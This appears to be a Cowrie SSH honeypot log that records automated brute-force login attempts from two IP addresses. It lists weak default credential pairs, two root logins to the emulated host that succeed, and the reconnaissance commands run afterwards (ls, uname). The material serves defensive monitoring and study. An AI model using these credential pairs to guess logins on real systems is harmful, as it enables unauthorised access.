{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:44.081293Z","src_ip":"212.227.125.160","session":"c57705ee0b82"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:45.299021Z","src_ip":"212.227.125.160","session":"c57705ee0b82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8091,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b04c333ed1e","protocol":"ssh","message":"New connection: 212.227.235.229:8091 (1.2.3.4:22) [session: 4b04c333ed1e]","sensor":"my-vps","timestamp":"2025-08-28T07:06:48.679603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:49.020589Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:49.022411Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44286,"dst_ip":"1.2.3.4","dst_port":22,"session":"509443c58196","protocol":"ssh","message":"New connection: 212.227.235.229:44286 (1.2.3.4:22) [session: 509443c58196]","sensor":"my-vps","timestamp":"2025-08-28T07:06:49.766640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:49.767566Z","src_ip":"212.227.235.229","session":"509443c58196"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:50.018222Z","src_ip":"212.227.235.229","session":"509443c58196"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T07:06:50.768973Z","src_ip":"212.227.235.229","session":"509443c58196"}
{"eventid":"cowrie.login.success","username":"root","password":"0899400729%9","message":"login attempt [root/0899400729%9] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:06:51.123684Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:52.019709Z","src_ip":"212.227.235.229","session":"509443c58196"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:06:52.388858Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T07:06:52.389527Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:53.007951Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:06:53.518308Z","src_ip":"212.227.235.229","session":"4b04c333ed1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d70c5d1fd32d","protocol":"ssh","message":"New connection: 212.227.125.160:50598 (1.2.3.4:22) [session: d70c5d1fd32d]","sensor":"my-vps","timestamp":"2025-08-28T07:06:59.468613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:06:59.471243Z","src_ip":"212.227.125.160","session":"d70c5d1fd32d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:06:59.684779Z","src_ip":"212.227.125.160","session":"d70c5d1fd32d"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:00.546326Z","src_ip":"212.227.125.160","session":"d70c5d1fd32d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:01.764475Z","src_ip":"212.227.125.160","session":"d70c5d1fd32d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54994,"dst_ip":"1.2.3.4","dst_port":22,"session":"8622de50073c","protocol":"ssh","message":"New connection: 212.227.235.229:54994 (1.2.3.4:22) [session: 8622de50073c]","sensor":"my-vps","timestamp":"2025-08-28T07:07:06.243037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:06.244183Z","src_ip":"212.227.235.229","session":"8622de50073c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:06.498637Z","src_ip":"212.227.235.229","session":"8622de50073c"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:07.264464Z","src_ip":"212.227.235.229","session":"8622de50073c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:08.521622Z","src_ip":"212.227.235.229","session":"8622de50073c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42842,"dst_ip":"1.2.3.4","dst_port":22,"session":"928edef5bcd5","protocol":"ssh","message":"New connection: 212.227.125.160:42842 (1.2.3.4:22) [session: 928edef5bcd5]","sensor":"my-vps","timestamp":"2025-08-28T07:07:16.126731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:16.142095Z","src_ip":"212.227.125.160","session":"928edef5bcd5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:16.346394Z","src_ip":"212.227.125.160","session":"928edef5bcd5"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:17.220490Z","src_ip":"212.227.125.160","session":"928edef5bcd5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:18.441554Z","src_ip":"212.227.125.160","session":"928edef5bcd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53306,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f8bf8fab272","protocol":"ssh","message":"New connection: 212.227.235.229:53306 (1.2.3.4:22) [session: 5f8bf8fab272]","sensor":"my-vps","timestamp":"2025-08-28T07:07:22.735986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:22.736680Z","src_ip":"212.227.235.229","session":"5f8bf8fab272"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:22.990728Z","src_ip":"212.227.235.229","session":"5f8bf8fab272"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:23.754119Z","src_ip":"212.227.235.229","session":"5f8bf8fab272"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:25.010864Z","src_ip":"212.227.235.229","session":"5f8bf8fab272"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36838,"dst_ip":"1.2.3.4","dst_port":22,"session":"06fef3e59ac4","protocol":"ssh","message":"New connection: 212.227.125.160:36838 (1.2.3.4:22) [session: 06fef3e59ac4]","sensor":"my-vps","timestamp":"2025-08-28T07:07:32.473211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:32.473995Z","src_ip":"212.227.125.160","session":"06fef3e59ac4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:32.698267Z","src_ip":"212.227.125.160","session":"06fef3e59ac4"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:33.372376Z","src_ip":"212.227.125.160","session":"06fef3e59ac4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:34.594181Z","src_ip":"212.227.125.160","session":"06fef3e59ac4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58700,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfe069eb26e6","protocol":"ssh","message":"New connection: 212.227.235.229:58700 (1.2.3.4:22) [session: dfe069eb26e6]","sensor":"my-vps","timestamp":"2025-08-28T07:07:39.157065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:39.158044Z","src_ip":"212.227.235.229","session":"dfe069eb26e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:39.404818Z","src_ip":"212.227.235.229","session":"dfe069eb26e6"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:07:40.147509Z","src_ip":"212.227.235.229","session":"dfe069eb26e6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:41.397808Z","src_ip":"212.227.235.229","session":"dfe069eb26e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60380,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c2332c224f1","protocol":"ssh","message":"New connection: 212.227.125.160:60380 (1.2.3.4:22) [session: 6c2332c224f1]","sensor":"my-vps","timestamp":"2025-08-28T07:07:48.907235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:07:48.923867Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:07:49.129728Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.login.success","username":"root","password":"123321","message":"login attempt [root/123321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:07:50.059034Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:07:50.612020Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:07:50.612709Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:50.839647Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:07:50.840675Z","src_ip":"212.227.125.160","session":"6c2332c224f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51998,"dst_ip":"1.2.3.4","dst_port":22,"session":"323f5a2b7d06","protocol":"ssh","message":"New connection: 212.227.235.229:51998 (1.2.3.4:22) [session: 323f5a2b7d06]","sensor":"my-vps","timestamp":"2025-08-28T07:07:55.717880Z"}
